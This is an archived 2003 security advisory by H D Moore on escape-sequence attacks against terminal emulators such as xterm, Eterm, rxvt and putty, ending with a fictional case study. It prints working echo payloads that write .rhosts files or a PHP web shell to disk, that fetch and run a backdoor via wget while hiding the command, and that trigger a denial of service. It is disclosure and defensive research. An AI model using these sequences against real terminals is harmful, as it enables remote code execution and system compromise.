TUCoPS :: Unix :: General :: unix6022.htm

Hacking terminal emulators
25th Feb 2003 [SBWID-6022]
COMMAND

	Hacking terminal emulators

SYSTEMS AFFECTED

	[ Test Emulator Versions ]
	
	xterm:          xf86 4.2.0  (patch 165)
	aterm:          0.42
	rxvt:           2.7.8
	Eterm:          0.9.1
	konsole:        3.1.0 rc5
	putty:          0.53
	SecureCRT:      3.4.6
	gnome-terminal:	2.0.2 (libzvt 2.0.1) [2.2 indirectly]
	hanterm-xf:     2.0
	
	
	
	[ Vulnerability Index ]
	
	The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned CVE 
	candidate namess for all issues described in this paper. 
	
	CAN-2003-0020 Apache Error Log Escape Sequence Injection
	
	CAN-2003-0021 Screen Dump: Eterm 
	CAN-2003-0022 Screen Dump: rxvt
	
	CAN-2003-0063 Window Title Reporting: xterm 
	CAN-2003-0064 Window Title Reporting: dtterm
	CAN-2003-0065 Window Title Reporting: uxterm
	CAN-2003-0066 Window Title Reporting: rxvt
	CAN-2003-0067 Window Title Reporting: aterm
	CAN-2003-0068 Window Title Reporting: eterm
	CAN-2003-0069 Window Title Reporting: putty
	CAN-2003-0070 Window Title Reporting: gnome-terminal
	CAN-2003-0078 Window Title Reporting: hanterm-xf
	
	CAN-2003-0071 DEC UDK Processing DoS: xterm
	CAN-2003-0079 DEC UDK Processing DoS: hanterm-xf
	
	CAN-2003-0023 Menubar Manipulation: rxvt
	CAN-2003-0024 Menubar Manipulation: aterm
	

PROBLEM

	From  TERMINAL  EMULATOR  SECURITY  ISSUES  whitepaper  by  H  D  Moore,
	Copyright © 2003 Digital Defense Incorporated, All Rights Reserved :
	
	 [ Credits ]
	
	This paper was written by H D Moore, with much help  from  the  rest  of
	the Digital Defense  Operations  Team.  I  would  like  to  thank  Solar
	Designer for providing some great feedback on  the  original  draft  and
	Mark  Cox  for  handling  the  CVE  candidate  generation   and   vendor
	coordination.
	
	
	 [ Summary ]
	
	Many of the features supported by  popular  terminal  emulator  software
	can be abused when un-trusted data  is  displayed  on  the  screen.  The
	impact of this abuse  can  range  from  annoying  screen  garbage  to  a
	complete system  compromise.  All  of  the  issues  below  are  actually
	documented features, anyone who takes the time  to  read  over  the  man
	pages or source code could use them to carry out an attack.
	
	
	
	 [ Disclaimer ]
	
	There is nothing new in this paper. The entire concept of  exploiting  a
	terminal by supplying hostile input has been around for  over  10  years
	now. Unix veterans and BBS users have  been  exposed  to  this  type  of
	problem since the very beginning, a newsgroup search  can  turn  up  all
	sorts of exploits, from the ever-popular "flash" program  to  the  abuse
	of logging features in xterm which were disabled in  R5.  Therefore  the
	purpose of this paper is to identify weaknesses in the current suite  of
	popular terminal emulation software, not to rehash an ancient problem.
	
	
	
	 [ Escape Sequences ]
	
	Typically, an escape sequence is a series of  characters  starting  with
	the ASCII escape character (0x1B) and followed  by  a  specific  set  of
	arguments. Escape sequences were  originally  used  to  control  display
	devices such as dumb terminals and have been extended to  allow  various
	forms of interaction with modern operating systems. An  escape  sequence
	might be used to  change  text  attributes  (color,  weight),  move  the
	cursor position, reconfigure the keyboard, update the window  title,  or
	manipulate the printer. Over the years,  many  new  features  have  been
	added that required enhancements to the terminal  emulator  applications
	to support them.
	
	
	
	 [ Remote Exploitation ]
	
	To exploit an escape sequence feature,  an  attacker  must  be  able  to
	display arbitrary data to  the  victim's  terminal  emulator.  While  at
	first glance that may  seem  rather  unlikely,  the  attacker  can  take
	advantage of a number of small bugs in other  applications  to  increase
	their chance of success.
	
	Just about every network service that uses syslog will pass remote  data
	directly to the daemon  without  filtering  the  escape  character.  The
	responsibility then lays on the syslog daemon to strip the  escape  code
	before writing the log entry to the disk or terminal. Although both  the
	stock *BSD syslog daemons as well the  sysklogd  package  filter  escape
	sequences, msyslog, syslog-ng, and the  logging  daemons  supplied  with
	many commercial UNIX-based operating systems do not.
	
	While sending data directly to a vulnerable syslogd  or  rwalld  service
	is the most direct form of attack, there are literally dozens  of  other
	ways to place hostile binary data onto the terminal of  a  remote  user.
	The Apache web server makes an effort to clean garbage from  its  access
	logs, but it still allows escape characters  to  be  injected  into  the
	error logs. Many command-line  network  tools  can  be  exploited  by  a
	hostile service response, some examples of this is include  wget,  curl,
	ftp, and telnet.
	
	Multi-user systems are especially vulnerable, as any  user  can  send  a
	system-wide message under the default configuration  of  most  operating
	systems. Placing the attack data  into  the  banner  of  a  popular  FTP
	server, telnet service, or message of the day  file  will  increase  the
	chance of finding a valid target. Certain console email  clients  refuse
	to display files when the content-type of an  attachment  is  set  to  a
	unrecognized value, so the user must save the file and then read  it  on
	the command line, often just using the standard "cat" utility.
	
	
	
	 [ Screen Dumping ]
	 
	Eterm and rxvt both implement what they call the "screen dump"  feature.
	This escape sequence will cause an  arbitrary  file  to  be  opened  and
	filled with the current contents of the terminal window. These  are  the
	only two tested emulators[1] that still had  the  ability  to  write  to
	files enabled by default. Although rxvt will ignore  dump  requests  for
	existing files, Eterm[2] will happily delete the file  and  then  create
	it again. Although it is technically the  same  feature,  the  OSC  code
	used to trigger it is different between the  two  emulators.  For  rxvt,
	the screen dump code is 55, for Eterm, it  is  30.  It  is  possible  to
	control the  entire  contents  of  the  file  by  specifying  the  reset
	sequence, then the required data, followed by the screen dump command.
	
	$ echo -e "\ec+ +\n\e]<Code>;/home/user/.rhosts\a"
	
	The same approach can be used to  create  an  authorized_keys  file  for
	SSH, a replacement passwd file, or even a hostile PHP script written  to
	the user's web directory. This attack requires  no  interaction  on  the
	part of the  user  and  would  be  very  difficult  to  detect  if  done
	correctly. The primary difference between this issue  and  some  of  the
	others mentioned  in  this  paper  is  that  the  actual  "exploitation"
	happens on the system running the emulator  software,  not  the  current
	system that the terminal is accessing. The code that is responsible  for
	opening the dump file is shown below.
	
	/* rxvt */ 
	if ((fd = open(str, O_RDWR | O_CREAT | O_EXCL, 0600)) >= 0) 
	
	/* Eterm */ 
	unlink(fname);
	outfd = open(fname, O_CREAT | O_EXCL | O_NDELAY | O_WRONLY, S_IRUSR | S_IWUSR);
	
	[1] XFree86's xterm disabled an  equivalent  feature  in  X11R5  due  to
	security concerns. It can still be enabled with a compile-time option.
	
	[2] Eterm actually disabled this in 0.9.2 (October  31,  2002),  however
	many recent Linux distributions still shipped with 0.9.1.
	
	
	
	 [ Window Title Reporting ]
	
	One of the  features  which  most  terminal  emulators  support  is  the
	ability for the shell to set the title of the  window  using  an  escape
	sequence. This feature was originally implemented  by  DEC  for  DECterm
	and has since been added to most emulators in use today.  The  easy  way
	to set the window title of a terminal is using the echo command:
	
	$ echo -e "\e]2;This is the new window title\a"
	
	When the output of the above command is displayed on  the  terminal,  it
	will set the window title to that string. Setting the  window  title  by
	itself is not much of a security issue, however certain  xterm  variants
	(and dtterm) also provide an escape sequence for reporting  the  current
	window title. This essentially takes the current  title  and  places  it
	directly on the command  line.  Due  to  the  way  that  most  emulators
	processes the escape sequence, it is not possible to  embed  a  carriage
	return into the window title itself, so  the  user  would  need  to  hit
	enter for it to process the title as a command. The escape sequence  for
	reporting the window title is:
	
	$ echo -e "\e[21t"
	
	At this point, the attacker needs to convince the user to hit enter  for
	the "exploit" to succeed. There are a number of techniques available  to
	both hide the  command  and  encourage  the  user  to  "press  enter  to
	continue". The simplest is to just  insert  a  prompt  followed  by  the
	"invisible"  character  attribute  right  before  reporting  the  title.
	Another method is to set the foreground and background colors to be  the
	same (all black or white) and hope the user  hits  the  enter  key  when
	trying to determine what  happened.  The  following  example  for  xterm
	demonstrates a sequence that downloads and  executes  a  backdoor  while
	hiding the command line. The "Press Enter >" string  should  be  changed
	to something appropriate for the attack vector. Some  likely  candidates
	include "wget internal  error:  press  enter  to  continue"  or  "Error:
	unknown TERM, hit enter to continue".
	
	$ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"
	
	Any terminal emulator that allows the window title to be placed  on  the
	command-line is vulnerable to this attack. The applications  which  were
	confirmed vulnerable include xterm, dtterm, uxterm, rxvt, aterm,  Eterm,
	hanterm, and putty[1]. The tested applications that did  not  allow  the
	title to be written include gnome-terminal 2.0, konsole, SecureCRT,  and
	aterm.
	
	[1] Although putty would place the title onto the command-line, we  were
	not able to find a method of  hiding  the  command,  since  neither  the
	"invisible" character attribute nor the foreground color could  be  set.
	Putty has a relatively low limit to the number of  characters  that  can
	be placed into the window title, so it is not possible to  simply  flood
	the screen with garbage and hope the  command  rolls  past  the  current
	view.
	
	
	
	 [ Miscellaneous Issues ]
	
	Eterm should be given an award for the "Easiest to Compromise"  terminal
	emulator. The developers based much of their code off of  the  rxvt  and
	xterm source, so Eterm tends to share the same  problems  as  those  two
	emulators as well. If you happen to be running a CVS  version  of  Eterm
	from between February 10th and May 8th  of  2001,  it  was  possible  to
	execute an arbitrary command just by  displaying  the  following  escape
	sequence:
	
	$ echo -e "\e]6;73;command\a"
	 
	Fortunately, this feature never made it into an  official  release,  the
	"fork-and-exec" ability  was  replaced  by  the  script  action  spawn()
	instead.
	
	During the research process, a number of  small  bugs  were  found  that
	would either lock up the emulator completely or crash it. Although  they
	can be disregarded as simple denial of service attacks,  they  could  be
	abused to prevent an administrator from seeing subsequent logs during  a
	compromise. In general,  the  code  which  processed  application-  side
	input seemed to place little emphasis  on  sanitizing  the  data  before
	passing it directly to system-level  functions.  While  there  was  some
	effort made to avoid standard buffer overflows, much of  the  loop-based
	character processing appeared ripe for a denial of  service  attack.  An
	example of this is a bug in the DEC UDK processing  of  XFree86's  xterm
	application, the following command will place the process into  a  tight
	resource-eating loop:
	
	$ echo -e "\eP0;0|0A/17\x9c"
	
	This bug was reported to xfree86@xfree86.org on December 17th, 2002  and
	no response was received as of the  publication  of  this  writing.  The
	hanterm application is also vulnerable to this issue, as the  code  base
	started off as a direct copy of xterm.
	
	Both rxvt and aterm  support  a  feature  known  as  the  menuBar.  This
	feature allows the user to create drop-down menus  at  the  top  of  the
	terminal  screen  using  both  menu  configuration  files   and   escape
	sequences. Anyone able to display data on the terminal could modify  the
	menu entries in a way that would compromise the  system  when  accessed.
	This type of  attack  relies  more  on  social  engineering,  but  still
	provides a potential entry point when nothing  else  is  available.  The
	example below will create a new top-level  menu  item  called  "Special"
	with a single item labeled "Access", when clicked it will  download  and
	execute a backdoor from http://127.0.0.1/.bd and exit the shell.
	
	$  echo -e "\e]10;[:/Special/{Access} wget 127.0.0.1/.bd\rsh bd\rexit\r:]\a\e]10;[show]\a"
	
	
	
	 [ Terminal Defense ]
	
	The ideal solution is to sanitize all data before displaying it on  your
	terminal, however without a custom terminal application or data  filter,
	you can't guarantee that every tool  you  use  on  the  command-line  is
	going to strip escape sequences. The responsibility should rest  on  the
	actual terminal emulator; any features that allow file  or  command-line
	access should be disabled by default and more attention should  be  paid
	to new features that implement any use of escape sequences.
	
	The tested terminal emulators that were not susceptible  to  the  screen
	dump  or  window  title   attacks   include   KDE's   konsole,   Gnome's
	gnome-terminal, Vandyke's SecureCRT, and Sasha  Vasko's  aterm.  Konsole
	and gnome-terminal each use their own independent code-base  and  didn't
	try to support the same massive feature set  as  the  others.  SecureCRT
	took a similar  approach,  emulating  just  the  minimum  needed  to  be
	usable. With aterm, the code was originally based on rxvt, however  many
	of the dangerous features were removed as the project progressed.
	
	
	
	
	
	
	 [ A Fictitious Case Study ]
	
	Jim is the sole administrator for the web server farm  at  a  moderately
	sized ISP. Most of his company's clients maintain their  own  sites  and
	Jim's primary responsibility is to  keep  the  web  servers  online  and
	secured. Jim spends some of his spare time dabbling with  PHP  and  uses
	his workstation as his development system. The  workstation  is  on  the
	same network segment as the rest of the servers and  the  firewall  only
	allows TCP port 80 and 443 inbound. Jim has a new 2.5Ghz P4 and  finally
	has enough processing power to  run  the  Enlightenment  window  manager
	with all the tweaks.  His  favorite  part  about  Enlightenment  is  the
	terminal  emulator,  Eterm,  which  lets   him   make   the   background
	transparent and do all  sorts  of  imaging  tricks.  Jim  keeps  a  tail
	process running for the error_log  files  on  each  server  he  manages,
	allowing him to easily spot script  bugs  and  misconfigurations  before
	the customer calls him to fix it.
	
	Andre is pissed. Some "friends" from his old hacking group  have  posted
	some embarrassing photos of him on the group's home page.  The  page  is
	hosted in the ~user directory on a web server at some dinky ISP his  old
	friend uses. He starts poking at the web server only to  give  up  about
	30 minutes later after failing  to  find  a  single  vulnerable  CGI  or
	outdated service. He starts up Nmap again, this time on the whole  class
	C that the web server resides in, determined to  take  down  the  entire
	subnet if he has to. He finds another web server, this one is running  a
	traceroute gateway that is  vulnerable  to  meta-  character  injection.
	Andre manages to get an outbound shell  back  to  a  bounce  system  and
	proceeds to poke around. He finds what appears to be an  OpenSSH  public
	key in the /tmp directory, named JimH.pub. Looking at the key  file,  he
	sees that the userid stored  in  it  is  for  jim@jimsbox.weeisp.com.  A
	quick check shows  that  jimsbox.weeisp.com  not  only  resolves  to  an
	external address, but is also running a web server.
	
	The index page of Jim's web server consists  of  a  couple  pictures  of
	him, some links to his favorite news sites, some screenshots of his  new
	super-leet desktop, and some of his latest PHP projects. The  first  PHP
	project  link  Andre  clicks  on  immediately  starts  spewing   errors,
	complaining about not being able to connect to the database.  The  error
	message itself is interesting though, since it contains  the  full  path
	to the script that triggered the error. Andre  makes  a  quick  note  of
	this and keeps digging around, hoping for an easy entry point.  As  soon
	as he pulls up the desktop screen shots, he knows he  struck  gold.  The
	screen shot not  only  shows  a  scantily  clad  Italian  model  in  the
	background, but an Eterm open tailing the logs of the  same  server  his
	pictures  are  being  served  from.  He  gets  to  work,   hitting   the
	workstation with every tool he can find, but  an  hour  later  he  still
	hasn't busted a shell. While looking through  the  screen  shots  again,
	Andre gets the idea to look at the  Eterm  documentation  and  see  what
	other features it supports. Not only is the documentation easy  to  read
	with  plenty  of  examples,  but  it  mentions  an  interesting  feature
	described as a "screen dump".
	
	About two hours later, Andre finally manages to get  Eterm  and  its  60
	megabytes of support libraries compiled.  He  discovers  that  to  force
	Eterm to write out a file, all  he  has  to  do  is  display  a  certain
	sequence of characters to the screen. The question now  is  how  to  get
	those characters onto that Eterm at 4:30 in the morning. After  a  quick
	review of the Apache source code, he finally finds a spot in  the  error
	handling code where he can inject arbitrary data  into  the  log  files.
	All he has to do is send a request for a file with the  escape  sequence
	he wants to use and Apache will write the unfiltered  data  directly  to
	the log file.
	
	Now that he can write arbitrary files to  the  workstation,  he  has  to
	find a method of using it to gain access. Andre is pretty sure that  the
	workstation is running SSH, but the only  ports  available  are  80  and
	443. He remembers that the PHP errors he saw earlier provided  the  full
	path to the web root, if he can write files there, then he run  commands
	through the web server. Five minutes later, Andre is connecting  to  the
	target web server and sending a GET request for a string generated  with
	the following command:
	
	$ echo -e "\ec<?passthru($c);?>\e]30;/home/www/htdocs/owned.php\a"
	
	This command clears the current screen buffer, displays his hostile  PHP
	code to the screen, and then uses the screen dump command  to  write  it
	into    the    web    root.     He     points     his     browser     to
	http://jimsbox.weeisp.com/owned.php?c=id  and  starts  the  process   of
	rooting Jim's workstation, stealing  his  SSH  keys,  and  taking  those
	horrid pictures (as well as the rest of the group's files) off  of  that
	web server.

SOLUTION

	Check your favorite terminal homepage :-)
	
	
	 [ References ]
	
	This   Paper   and   Associated   Tools    font    color=#00ff00>    ---
	http://www.digitaldefense.net/labs/whitepapers.html                  ---
	http://www.digitaldefense.net/labs/securitytools.html
	
	Recognized   Escape   Sequences   font   color=#00ff00>    ---    Eterm:
	http://www.eterm.org/docs/view.php?doc=ref          ---           xterm:
	http://rtfm.etla.org/xterm/ctlseq.html            ---            dtterm:
	http://hpc.uky.edu/cgi-bin/man.cgi?section=all&topic=dtterm      ---
	rxvt:   http://www.rxvt.org/refer/rxvtRef.html
	
	Solar Designer's  Post  on  Syslog  Filtering  font  color=#00ff00>  ---
	http://marc.theaimsgroup.com/?l=bugtraq&m=96938656931350
	
	ADM's   "The   Evil   Escape   Sequences"   font   color=#00ff00>    ---
	http://www.attrition.org/security/advisory/ADM/adm.evil.esc.advisory
	
	AmigaOS   Escape   Sequence    Exploits    font    color=#00ff00>    ---
	http://www.abraxis.co.uk/SA-2001-11-08.html
	
	MS-DOS/Windows    Key    Redefinition    font     color=#00ff00>     ---
	http://lists.insecure.org/lists/bugtraq/1994/Jul/0029.html
	
	Multiple  Emulator   Window   Resize   DoS   font   color=#00ff00>   ---
	http://archives.neohapsis.com/archives/bugtraq/2000-05/0409.html     ---
	http://groups.google.com/groups?selm=E12zFeu-00075I-00%40ixion
	
	The      Original      "Flash"       font       color=#00ff00>       ---
	http://www.parallaxresearch.com/files/unix/exploits/flash.c          ---
	http://groups.google.com/groups?selm=342k7c%243ne%40news.ysu.edu     ---
	http://www.phrack-dont-give-a-shit-about-dmca.org/show.php?p=47&a=4
	

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH